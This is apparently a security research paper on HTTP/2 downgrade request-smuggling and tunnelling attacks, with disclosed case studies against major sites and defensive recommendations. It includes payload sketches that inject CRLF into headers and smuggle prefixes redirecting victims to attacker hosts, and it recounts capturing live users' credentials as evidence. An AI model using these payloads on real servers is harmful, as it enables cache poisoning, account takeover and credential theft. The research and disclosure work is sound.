HTTP/2 is easily mistaken for a transport-layer protocol that can be swapped in with zero security impact on the website behind it. In this article, I'll introduce multiple new classes of HTTP/2-exclusive threats caused by implementation flaws and RFC imperfections.
I'll start by showing how these flaws enable HTTP/2-exclusive desync attacks, with case studies targeting high-profile websites powered by servers ranging from Amazon's Application Load Balancer to WAFs, CDNs, and bespoke stacks by big tech. These attacks achieve critical impact by hijacking clients, poisoning caches, and stealing credentials to net multiple maximum bounties.
After that, I'll unveil novel techniques and tooling to crack open desync-powered request tunnelling - a widespread but overlooked variant of request smuggling that's often mistaken for a false positive. Finally, I'll share multiple new exploit primitives introduced by HTTP/2, exposing fresh server-layer and application-layer attack surface.
This research paper accompanies a presentation given at Black Hat USA and DEF CON, and a recording will be embedded on this page shortly. It's also available as a printable white paper. The paper focuses purely on the technical details - if you'd like to hear more about the research process, check out the presentation:
The first step to exploiting HTTP/2 is learning the protocol fundamentals. Fortunately, there's less to learn than you might think.
I started this research by writing an HTTP/2 client from scratch, but concluded that for the attacks described in this paper, we can safely ignore many low-level details such as frames and streams.
Although HTTP/2 is complex, it's designed to transmit the same information as HTTP/1.1. Here's an equivalent request expressed in each of the two protocols.
Assuming you're already familiar with HTTP/1, there are only three new concepts you need to understand.
In HTTP/1, the first line of the request contains the request method and path. HTTP/2 replaces the request line with a series of pseudo-headers. The five pseudo-headers are easy to recognize because they're represented using a colon at the start of the name:
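As a rough illustration of this mapping (an explanatory sketch, not a real API - the function and parameter names are invented), here's how an HTTP/1.1 request line and Host header translate into pseudo-headers:

```python
# Sketch: how an HTTP/1.1 request line plus Host header map onto HTTP/2
# request pseudo-headers. (The fifth pseudo-header, :status, only appears
# in responses.) Function and parameter names here are illustrative.

def to_pseudo_headers(request_line: str, host: str, scheme: str = "https") -> dict:
    """Split an HTTP/1.1 request line into HTTP/2 request pseudo-headers."""
    method, path, _version = request_line.split(" ", 2)
    return {
        ":method": method,
        ":path": path,
        ":authority": host,  # roughly equivalent to the Host header
        ":scheme": scheme,
    }

example = to_pseudo_headers("POST /login HTTP/1.1", "example.com")
```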
HTTP/1 is a text-based protocol, so requests are parsed using string operations. For example, a server needs to look for a colon in order to know where a header name ends. The potential for ambiguity in this approach is what makes desync attacks possible. HTTP/2 is a binary protocol, more like TCP, so parsing is based on predefined offsets and much less prone to ambiguity. This paper represents HTTP/2 requests using a human-readable abstraction rather than the actual bytes. For example, on the wire, pseudo-header names are actually mapped to a single byte - they don't literally contain a colon.
In HTTP/1, the length of each message body is indicated by the Content-Length or Transfer-Encoding header.
In HTTP/2, these headers are redundant because every message body is composed of data frames with a built-in length field. This means there's little room for ambiguity about the length of a message, and might leave you wondering how HTTP/2 desync attacks are even possible. The answer is HTTP/2 downgrading.
HTTP/2 downgrading means the front-end server speaks HTTP/2 with the client, but rewrites each request into HTTP/1.1 before forwarding it to the back-end server. This protocol translation enables a whole range of attacks, including HTTP request smuggling:
Classic request smuggling vulnerabilities mostly occur because the front-end and back-end disagree about whether to derive a request's length from its Content-Length (CL) or Transfer-Encoding (TE) header. Depending on how this desynchronization happens, the vulnerability is classified as CL.TE or TE.CL.
Front-ends speaking HTTP/2 almost always use HTTP/2's built-in message length. However, the back-end receiving the downgraded request doesn't have access to this data, and must use the CL or TE header. This leads to two main classes of vulnerability: H2.TE and H2.CL.
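To make the H2.CL failure mode concrete, here's a minimal sketch (not real server code - the parsing is deliberately simplified) of how a back-end that trusts an attacker-supplied Content-Length splits the downgraded request, leaving leftover bytes that poison the next request on the connection:

```python
# Sketch of an H2.CL desync: the front-end forwards the full HTTP/2 body,
# but the back-end trusts the (attacker-controlled) Content-Length header
# of the downgraded request and stops reading early.

def backend_split(downgraded: bytes) -> tuple:
    """Return (body this request claims, leftover bytes that will be
    interpreted as the start of the next request on the connection)."""
    head, _, body = downgraded.partition(b"\r\n\r\n")
    content_length = 0
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            content_length = int(line.split(b":", 1)[1].decode())
    return body[:content_length], body[content_length:]

downgraded = (b"POST / HTTP/1.1\r\n"
              b"Host: example.com\r\n"
              b"Content-Length: 4\r\n\r\n"
              b"abcdGET /admin HTTP/1.1\r\nX: y")
body, leftover = backend_split(downgraded)
# leftover now begins with a smuggled request prefix
```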
We've now covered enough theory to start exploring some real vulnerabilities. To find these, I implemented automated detection in HTTP Request Smuggler, using an adapted, timeout-based version of the H1-desync detection strategy. Once that was implemented, I used it to scan my pipeline of websites with bug bounty programs. All the vulnerabilities cited here have been patched unless otherwise stated, and over 50% of the total bounty earnings have been donated to local charities.
The following sections assume the reader is familiar with HTTP request smuggling. If you find any of the explanations insufficient, I'd suggest reading or watching HTTP Desync Attacks: Request Smuggling Reborn, and working through our Web Security Academy labs.
Thanks to HTTP/2's data-frame length field, the Content-Length header is unnecessary. However, the HTTP/2 RFC states that this header is permitted, provided it's correct. For our first case study, we'll target www.netflix.com, whose front-end performed HTTP downgrading without verifying the Content-Length. This enabled an H2.CL desync.
To exploit it, I issued the following HTTP/2 request:
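The original payload isn't reproduced here, so the following is only an illustrative sketch in the human-readable abstraction described earlier; the path, length, and attacker domain are placeholders:

```
:method         POST
:path           /
:authority      www.netflix.com
content-length  4

abcdGET / HTTP/1.1
Host: attacker-controlled.example
Foo: bar
```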
After this request was downgraded to HTTP/1.1 at the front-end, it hit the back-end looking something like:
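Again as an illustrative sketch rather than the original traffic, the downgraded request would take roughly this shape:

```
POST / HTTP/1.1
Host: www.netflix.com
Content-Length: 4

abcdGET / HTTP/1.1
Host: attacker-controlled.example
Foo: bar
```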
Thanks to the incorrect Content-Length, the back-end stopped processing the request early, and the data shown in orange was treated as the start of another request. This enabled me to append an arbitrary prefix to the next request, regardless of who sent it.
I crafted the orange prefix to trigger a response redirecting the victim's request to my server at 02.rs:
Netflix traced this vulnerability through Zuul to Netty, and it has since been patched and tracked as CVE-2021-21295. Netflix awarded their maximum bounty - $20,000.
Next, let's look at a simple H2.TE desync. The RFC states that any message containing connection-specific header fields must be treated as malformed. One connection-specific header field is Transfer-Encoding. Amazon Web Services' (AWS) Application Load Balancer failed to obey this line, and accepted requests containing Transfer-Encoding. This meant I could exploit almost every website using it, via an H2.TE desync.
One vulnerable website was Verizon's law enforcement access portal, located at id.b2b.oath.com. I exploited it with the following request:
The front-end downgraded this request to:
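The original request isn't shown here; as an illustrative sketch only (the path and length value are placeholders), the downgraded request had roughly this shape:

```
POST /login HTTP/1.1
Host: id.b2b.oath.com
Content-Length: 46
Transfer-Encoding: chunked

0

GET /oops HTTP/1.1
Host: psres.net
X: X
```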
This should look familiar - exploiting H2.TE is very similar to CL.TE. After the downgrade, the 'Transfer-Encoding: chunked' header - easily missed by the front-end server - takes priority over the Content-Length inserted by the front-end. This makes the back-end stop parsing the request body early, and enables us to redirect arbitrary users to my site at psres.net.
When I reported this, the triager asked for further evidence that I could cause real harm, so I started redirecting live users, and quickly found that I was catching people mid-way through an OAuth login flow, leaking their credentials via the Referer header:
Verizon awarded a $7,000 bounty for this finding.
I encountered a similar vulnerability, with a different exploit path, on accounts.athena.aol.com - the CMS powering various news sites including the Huffington Post and Engadget. Here, once again, I could issue an HTTP/2 request that, after being downgraded, would hit the back-end and inject a prefix redirecting victims to my domain:
Once again, the triager wanted more evidence, so I took the opportunity to redirect some live users. This time, however, redirecting users resulted in a request hitting my server that effectively asked 'can I send you my credentials?':
I hastily configured my server to grant them permission:
And received a stream of lovely credentials:
This revealed some interesting browser behavior that I'd need to explore later, and also earned another $10,000 from Verizon.
I also reported the root vulnerability directly to Amazon, who have since patched the Application Load Balancer, so their customers' websites are no longer exposed. Unfortunately, they don't have a research-friendly bug bounty program.
Every website using Imperva's Cloud WAF was also vulnerable, continuing the grand tradition of web application firewalls making websites easier to hack.
Since HTTP/1 is a plaintext protocol, it's impossible to put certain parsing-critical characters in certain positions. For example, you can't put a \r\n sequence inside a header value - you'll just end up terminating the header instead.
HTTP/2's binary design, combined with the way it compresses headers, makes it possible to put arbitrary characters in arbitrary positions. Servers are expected to re-impose HTTP/1-style restrictions with an extra validation step:
Naturally, many servers skip this verification step.
One vulnerable implementation was the Netlify CDN, which enabled H2.TE desync attacks on every website based on it, including Firefox's start page at start.mozilla.org. I crafted an exploit using '\r\n' inside a header value:
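In the abstraction used in this paper, the key ingredient is a header whose value contains a raw \r\n sequence - something along these lines (the header name and surrounding details are illustrative):

```
foo: b\r\nTransfer-Encoding: chunked

-- downgrades to -->

Foo: b
Transfer-Encoding: chunked
```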
During the downgrade, the \r\n triggered a request header injection vulnerability, introducing an extra header: Transfer-Encoding: chunked.
This triggered an H2.TE desync, with a prefix designed to make the victim receive malicious content from my own Netlify domain. Thanks to Netlify's cache setup, the harmful response would be saved and persistently served to anyone else attempting to access the same URL. In effect, I had full control over every page on every site on the Netlify CDN. The total bounty for this came to US$4,000.
Atlassian's Jira looked like it had a similar vulnerability. I created a simple proof of concept intended to trigger two distinct responses - a normal one, and the robots.txt file. What actually happened was something else entirely:
The server started sending me responses clearly intended for other Jira users, including vast quantities of sensitive information and PII.
The root cause was a small optimization I'd made when crafting the payload. I'd decided that rather than using \r\n to smuggle a Transfer-Encoding header, I'd use a double \r\n to terminate the first request, letting me include my malicious prefix directly in the headers:
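The optimized payload packed the entire prefix into a single header value using a double \r\n - roughly like this (the header name and the details of the smuggled request are illustrative, though /robots.txt was one of the targeted responses):

```
foo: bar\r\n\r\nGET /robots.txt HTTP/1.1\r\nX-Ignore: x
```

After the downgrade, everything following the \r\n\r\n was intended to sit at the start of the back-end's next request.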
This approach avoided the need for chunked encoding, a message body, and the POST method. However, it failed to account for a crucial step in the HTTP downgrade process - the front-end must terminate the headers with the sequence \r\n\r\n. This meant it terminated my prefix, turning it into a complete standalone request:
Instead of the usual one-and-a-half requests, the back-end saw exactly two. I received the first response, but the next user received the response to my smuggled request. The response they should have received was then sent to the user after them, and so on. In effect, the front-end started serving each user the response to the previous user's request, indefinitely.
To make matters worse, some of these responses contained Set-Cookie headers that persistently logged users into other users' accounts. After deploying a patch, Atlassian opted to globally expire all user sessions.
@defparam hinted at this potential impact in Practical Attacks Using HTTP Request Smuggling, but I think its generality is underestimated. For obvious reasons, I haven't tried it on many live sites, but as far as I can tell, this exploit path is almost always possible. So, if you find a request smuggling vulnerability and the vendor won't take it seriously without more evidence, smuggling two requests should give them the evidence they're looking for.
The front-end responsible for Jira's vulnerability was PulseSecure Virtual Traffic Manager. Atlassian awarded $15,000 - three times their maximum bounty.
Beyond Netlify and PulseSecure Virtual Traffic Manager, this technique also worked on a few other servers. Working with the Computer Emergency Response Team (CERT), we found that F5's Big-IP load balancers are vulnerable too - for further details, refer to advisory K97045220. It also worked on Imperva Cloud WAF.
While waiting for PulseSecure's patch, Atlassian attempted some mitigations of their own. The first disallowed newlines in header values, but failed to filter header names. This was easy to exploit because the server tolerated colons in header names - something that's impossible in HTTP/1.1:
The initial patch also failed to filter pseudo-headers, leading to a request-line injection vulnerability. Exploiting these is simple: just visualize where the injection occurs, and ensure the resulting HTTP/1.1 request has a valid request line:
The final flaw in the patch was blocking the classic '\r\n' but not '\n' by itself - the latter is almost always sufficient for exploitation.
Next, let's look at something less flashy and less obvious, but still dangerous. During this research, I noticed that one subclass of desync vulnerability is largely being ignored due to a lack of knowledge about how to identify and exploit it. In this section, I'll explore the theory behind it, then tackle both of those problems.
Whenever a front-end receives a request, it must decide whether to route it down an existing connection to the back-end, or establish a new back-end connection. The connection-reuse strategy adopted by the front-end can have a major effect on which attacks you can successfully launch.
Most front-ends are happy to send any request down any connection, enabling the cross-user attacks we've already seen. However, sometimes you'll find that your prefix only affects requests coming from your own IP. This happens because the front-end is using a separate back-end connection for each client IP. It's a bit of a nuisance, but you can often work around it by indirectly attacking other users via cache poisoning.
Some other front-ends enforce a one-to-one relationship between connections from the client and connections to the back-end. This is an even stricter restriction, but regular cache poisoning and internal-header-leaking techniques still apply.
When a front-end opts to never reuse connections to the back-end, life gets really challenging. Sending a request that directly affects a subsequent request becomes impossible:
That leaves one exploit primitive: request tunnelling. This primitive can also arise via other means, such as H2C smuggling, but this section will focus on desync-powered tunnelling.
Detecting request tunnelling is easy - the usual timeout-based technique works fine. The first real challenge is confirming the vulnerability - you can confirm a regular request smuggling vulnerability by sending a flurry of requests and seeing whether an earlier request affects a later one. Unfortunately, this technique always fails on request tunnelling, making it extremely easy to mistake the vulnerability for a false positive.
We need a new confirmation technique. One obvious approach is to simply smuggle a complete request and see whether you get two responses:
Unfortunately, the response shown here doesn't actually tell us the server is vulnerable! Concatenating multiple responses is exactly how HTTP/1.1 keep-alive works, so we can't tell whether the front-end thinks it's sending us one response (and is vulnerable) or two (and is secure). Fortunately, HTTP/2 neatly solves this problem for us. If you spot HTTP/1 headers inside an HTTP/2 response body, you've just found yourself a desync:
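This check can be sketched as a simple heuristic (illustrative only - the real detection logic in HTTP Request Smuggler is more involved):

```python
# Heuristic sketch: an HTTP/1 status line at the start of an HTTP/2
# response *body* means the front-end glued two back-end responses
# together - strong evidence of a desync.

def looks_desynced(h2_response_body: bytes) -> bool:
    return h2_response_body.lstrip().startswith(b"HTTP/1.")

assert looks_desynced(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n")
assert not looks_desynced(b"<html>hello</html>")
```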
Thanks to a second problem, this approach doesn't always work. Front-end servers often use the Content-Length of the back-end's response to decide how many bytes to read from the socket. This means that even if you can make two requests hit the back-end, and trigger two responses from it, the front-end will only pass you the first, less interesting, response.
In the following example, thanks to the highlighted Content-Length, the orange 403 response is never delivered to the user:
Sometimes, persistence can substitute for insight. Bitbucket was vulnerable to blind tunnelling, and after four months of recurring effort, I stumbled on a solution. The response from the endpoint was so large it made Burp Repeater lag slightly, so I decided to shorten it by switching my method from POST to HEAD. This effectively asks the server to return the response headers, but omit the response body:
Sure enough, this made the back-end serve only the response headers... including the Content-Length header of the undelivered body! This made the front-end over-read, and serve part of the response to the second, smuggled request:
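The over-read can be sketched as follows (a deliberate simplification, under the assumption that the front-end blindly trusts the HEAD response's Content-Length):

```python
# Sketch of the HEAD over-read: a HEAD response has headers but no body,
# yet still advertises a Content-Length. A front-end that trusts it reads
# that many extra bytes from the socket - bytes which actually belong to
# the response to the smuggled request.

def frontend_read(backend_stream: bytes) -> bytes:
    head, _, rest = backend_stream.partition(b"\r\n\r\n")
    content_length = 0
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            content_length = int(line.split(b":", 1)[1].decode())
    # HEAD responses carry no body, so these bytes are the next response
    return head + b"\r\n\r\n" + rest[:content_length]

backend_stream = (b"HTTP/1.1 200 OK\r\nContent-Length: 50\r\n\r\n"
                  b"HTTP/1.1 403 Forbidden\r\nContent-Length: 0\r\n\r\n")
leaked = frontend_read(backend_stream)
# 'leaked' now contains the smuggled 403 response inside the HEAD response
```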
So, if you suspect a blind request tunnelling vulnerability, try HEAD and see what happens. Thanks to the timing-sensitive nature of socket reads, it may require a few attempts, and you'll find it easier to read the smuggled response if it's served quickly. This means that smuggling an invalid request works better for detection:
Smuggling an invalid request also makes the back-end close the connection, avoiding the possibility of accidental response-queue poisoning. Note that if the target is only vulnerable to tunnelling, response-queue poisoning is impossible anyway, so you needn't worry about it. Sometimes when HEAD fails, other methods such as OPTIONS, POST, or GET will work instead. I've added this technique to HTTP Request Smuggler as a detection method.
Request tunnelling lets you hit the back-end with a request that's completely unprocessed by the front-end. The most obvious exploit path is to use it to bypass front-end security rules such as path restrictions. However, you'll often find there are no relevant rules to bypass. Fortunately, there's a second option.
Front-end servers often inject internal headers used for critical functions, such as specifying who the user is logged in as. Attempts to exploit these headers directly usually fail because the front-end detects and rewrites them. You can use request tunnelling to bypass this rewrite and successfully smuggle internal headers.
There's one catch - internal headers are often invisible to attackers, and it's hard to exploit a header whose name you don't know. To help out, I've just released an update to Param Miner, adding support for guessing internal header names via request tunnelling. As long as the server's internal header is in Param Miner's wordlist, and causes a visible difference in the server's response, Param Miner should detect it.
Custom internal headers that don't appear in Param Miner's static wordlist and don't leak in site traffic may still evade detection. Regular request smuggling can be used to make the server leak its internal headers to the attacker, but that approach doesn't work with request tunnelling.
Fortunately, if you can inject newlines into headers via HTTP/2, there's another way to discover internal headers. Classic desync attacks rely on making the two servers disagree about where the request body ends, but with newlines, we can instead cause a disagreement about where the body starts!
To obtain the internal headers used by Bitbucket, I issued the following request:
After downgrading, it looked something like:
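The actual request isn't reproduced here; as an illustrative sketch (the internal header names are invented and the length values are placeholders), the downgraded request had roughly this shape:

```
POST /search HTTP/1.1
Host: bitbucket.org
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Foo: bar

s=cow
X-Internal-Example: secret-value
X-Backend-Example: 42

<body as seen by the front-end>
```

The blank line after 'Foo: bar' was injected via HTTP/2, so the back-end treats everything from 's=cow' onward - internal headers included - as the request body.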
Can you see what I've done there? Both the front-end and back-end think I've sent one request, but they get confused about where the body starts. The front-end thinks 's=cow' is part of the headers, so it inserts the internal headers after it. This means the back-end ends up treating the internal headers as part of the 's' POST parameter I'm sending to the Wordpress-powered search function... and reflects them back at me:
Accessing different paths on bitbucket.org got my request routed to different back-ends, leaking different headers:
Since we're only triggering a single response from the back-end, this technique works even if the request tunnelling vulnerability is blind.
Finally, if the stars are aligned, you may be able to use tunnelling for an extra-powerful variety of web cache poisoning. You need a scenario where you have request tunnelling via an H2.X desync, the HEAD technique works, and there's a cache present. This lets you poison the cache with harmful responses crafted by mixing and matching arbitrary headers and bodies via HEAD.
Using this technique, after six months sitting on an apparently-useless vulnerability, I gained persistent control over every page on bitbucket.org.
Next, let's look at some HTTP/2-exclusive exploit primitives. I don't have full case studies for this section, but each primitive is based on behavior I've observed on real websites, and should give you a foothold on your targets.
In HTTP/1, duplicate headers are useful for a range of attacks, but it's impossible to send a request with multiple methods or paths. HTTP/2's decision to replace the request line with pseudo-headers means this is now possible. I've observed real servers that accept multiple :path headers, and server implementations are inconsistent about which :path they process:
Also, although HTTP/2 introduced the :authority header to replace the Host header, the Host header is still technically permitted. In fact, as far as I can tell, both are optional. This creates ample opportunity for Host-header attacks, such as:
Another HTTP/2 feature that doesn't deserve to be overlooked is the :scheme pseudo-header. The value of this is nominally 'http' or 'https', but it supports arbitrary bytes.
Some systems, including Netlify, used it to construct a URL without performing any validation. This lets you override the path, and in some cases, poison the cache:
Others used the scheme to build the URL to which the request was routed, creating an SSRF vulnerability.
Unlike the other techniques in this paper, these vulnerabilities work even when the target isn't performing HTTP/2 downgrading.
You'll find some servers that don't let you put newlines in header names, but do allow colons. Thanks to the trailing colon appended during downgrading, this rarely enables a full desync:
It's better suited to Host-header attacks, since the Host is expected to contain a colon, and servers usually ignore everything after it:
I did find one server where header-name splitting enabled a desync. But by the time I tried to investigate, the vulnerability had disappeared, and the server banner reported that they'd updated their Apache front-end. In an attempt to track down the vulnerability, I installed the old version of Apache locally. I couldn't replicate the issue, but I did discover something else.
Apache's mod_proxy allows spaces in the :method, enabling request-line injection. If the back-end server tolerates trailing junk in the request line, this lets you bypass block rules:
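As a sketch (the blocked path and fallback path are placeholders), a space-smuggling :method turns into a request line with trailing junk after the downgrade:

```
:method  GET /admin HTTP/1.1
:path    /fallback

-- downgrades to -->

GET /admin HTTP/1.1 /fallback HTTP/1.1
```

A back-end that parses only the first three tokens sees a request for /admin, while the front-end's block rules were applied to /fallback.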
I reported this issue to Apache on the 11th of May, and they confirmed it within 24 hours, reserved CVE-2021-33193, and said it would be fixed in 2.4.49. Unfortunately, at the time this whitepaper was published - 86 days after Apache was notified - 2.4.49 had not yet been released, so although there was a patch on master, this was effectively a zero-day. A patched version was subsequently released on the 16th of September.
HTTP/1.1 used to have a lovely feature called line folding, where you could put a \r\n followed by a space inside a header value, and the subsequent data would be 'folded' up into the original header.
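For example, under line folding, the following two forms are equivalent (the header name is illustrative):

```
X-Long-Header: foo
 bar

-- is equivalent to -->

X-Long-Header: foo bar
```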
Here's the same request, sent normally:
The feature was later deprecated, but plenty of servers still support it.
If you find a website with an HTTP/2 front-end that lets you send header names starting with a space, and a back-end that supports line folding, you can tamper with other headers, including internal ones. Here's an example where I tampered with an internal request-ID header - harmless in itself, but the back-end did reflect it:
Many front-ends don't sort incoming headers, so you'll find that by moving the space-prefixed header around, you can tamper with different internal and external headers.
Before we wrap up, let's take a look at some of the pitfalls and challenges you're likely to encounter when exploiting HTTP/2.
Since HTTP/2 and HTTP/1 share the same TCP port, clients need some way of determining which protocol to speak. When using TLS, most clients default to HTTP/1, and only use HTTP/2 if the server explicitly advertises support for it via the ALPN field during the TLS handshake. Some servers that support HTTP/2 forget to advertise this fact, leading clients to speak only HTTP/1 with them, and hiding a valuable attack surface.
Fortunately, this is easy to detect - just ignore the ALPN and try sending an HTTP/2 request regardless. You can scan for this scenario using HTTP Request Smuggler, Burp Scanner, or even curl:
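The underlying mechanism can be sketched offline: HTTP/2 connections open with a fixed preface, so a client with 'prior knowledge' can simply send it without waiting for ALPN negotiation (this is an illustrative helper, not a real tool):

```python
# HTTP/2's fixed client connection preface (RFC 7540, section 3.5).
# A client probing for unadvertised HTTP/2 support can send this directly
# over the TLS connection, regardless of what ALPN negotiated, and see
# whether the server responds with HTTP/2 frames.

H2_PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"

def speaks_h2(first_client_bytes: bytes) -> bool:
    """Server-side view: did the client open with the HTTP/2 preface?"""
    return first_client_bytes.startswith(H2_PREFACE)
```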
HTTP/2 puts a lot of effort into supporting multiple requests over a single connection. However, there are a couple of common implementation quirks to be wary of.
Some servers treat the first request on each connection differently, which can make a vulnerability appear intermittent, or even vanish entirely. Others will sometimes let a request corrupt a connection without tearing the connection down, silently influencing how all subsequent requests on it are processed.
If you spot either of these problems, you can mitigate them using the 'Enable HTTP/2 connection reuse' option in Burp Repeater, and the requestsPerConnection setting in Turbo Intruder.
This research was only possible thanks to substantial investment in developing an offensive HTTP/2 toolkit. HTTP/2's binary format means you can't use classic general-purpose tools like netcat and openssl. HTTP/2's complexity means you can't feasibly implement your own client, so you'll need to use a library. Existing libraries don't give users the essential capability of sending malformed requests. This rules out curl, too.
I started this research by writing my own stripped-down, open-source HTTP/2 stack from scratch, and integrating it into Turbo Intruder. To invoke it, change engine=Engine.THREADED to engine=Engine.HTTP2. It takes HTTP/1.1-formatted requests as input, then rewrites them into HTTP/2. During the rewrite, it performs a few character mappings on the headers to ensure every technique used in this presentation is possible:
You can also override pseudo-headers by specifying them as fake HTTP/1.1 headers. Here's an example targeting the Apache vulnerability mentioned earlier:
Turbo Intruder's HTTP/2 stack is currently not very tolerant of unusual server behavior. If you find it doesn't work on a particular target, I'd suggest trying Burp Suite's native HTTP/2 stack instead. It's more battle-tested, and you can invoke it from Turbo Intruder via Engine.BURP2.
To help you scan for these vulnerabilities, I've released a major update to HTTP Request Smuggler. It can find all the case studies mentioned in this paper. I've also ensured that Burp Suite's scanner can detect these vulnerabilities. Note that many of these capabilities rely on new APIs introduced in Burp Suite Pro/Community 2020.8. The exception is Turbo Intruder's HTTP/2 stack, which can even be used as a standalone command-line tool or library.
I've also helped integrate support for HTTP/2-exclusive attacks directly into Burp Suite. For about a year, Burp Suite has offered basic HTTP/2 support via an HTTP/1-style view, which performs light normalization (such as lowercasing header names) to prevent valid HTTP/1 requests from being converted into invalid HTTP/2 requests.
The HTTP/1-style view is convenient for regular, protocol-agnostic attacks, so we've left it roughly as-is, but taken steps to make the normalization visible.
However, many HTTP/2-exclusive attacks can't be expressed in HTTP/1-style syntax, so in Burp Suite 2021.8 we've added support for them via the Inspector sidebar. The Inspector view can now accurately represent HTTP/2 requests, including pseudo-headers, and lets you launch advanced attacks such as putting newlines in headers, or spaces in the path. If a request can't be expressed in HTTP/1-style syntax at all, we declare it 'kettled' (not my idea!) and hide the HTTP/1 view.
For more information, see Burp's HTTP/2 release notes and HTTP/2 documentation.
If you're configuring a web application, avoid HTTP/2 downgrading - it's the root cause of most of these vulnerabilities. Instead, use HTTP/2 end to end.
If you're writing an HTTP/2 server - especially one that supports downgrading - enforce the character-set restrictions present in HTTP/1: reject requests containing newlines in headers, colons in header names, spaces in the request method, and so on. Also, be aware that the specification isn't always explicit about where vulnerabilities can arise. Certain unflagged requirements, if skipped, will leave an otherwise-functional server with critical vulnerabilities. There are probably some hardening opportunities in the RFC, too.
Web developers would be well advised to shed assumptions inherited from HTTP/1. It's historically been possible to get away without extensively validating certain user inputs, such as the request method, but HTTP/2 changes this.
We're planning to launch a Web Security Academy topic on this research shortly, containing multiple labs to help you consolidate your understanding and gain hands-on experience exploiting realistic websites. If you'd like to be notified as soon as it's ready, consider following us on Twitter.
For another view of HTTP/2-powered request smuggling, I'd recommend Emil Lerner's HTTP Request Smuggling via Higher HTTP Versions.
For another explanation of HTTP response-queue poisoning, check out @defparam's Practical Attacks Using HTTP Request Smuggling.
We've seen that HTTP/2's complexity has contributed to server implementation shortcuts, insufficient offensive tooling, and poor risk awareness.
Through novel tooling and research, I've shown that widespread HTTP/2 downgrading leaves many websites exposed to severe request smuggling vulnerabilities. I've also shown that, request smuggling aside, HTTP/2's power and flexibility enable a wide range of other attacks that aren't possible with HTTP/1.
Finally, I've introduced practical techniques that make request tunnelling detectable and exploitable, particularly in the presence of HTTP/2.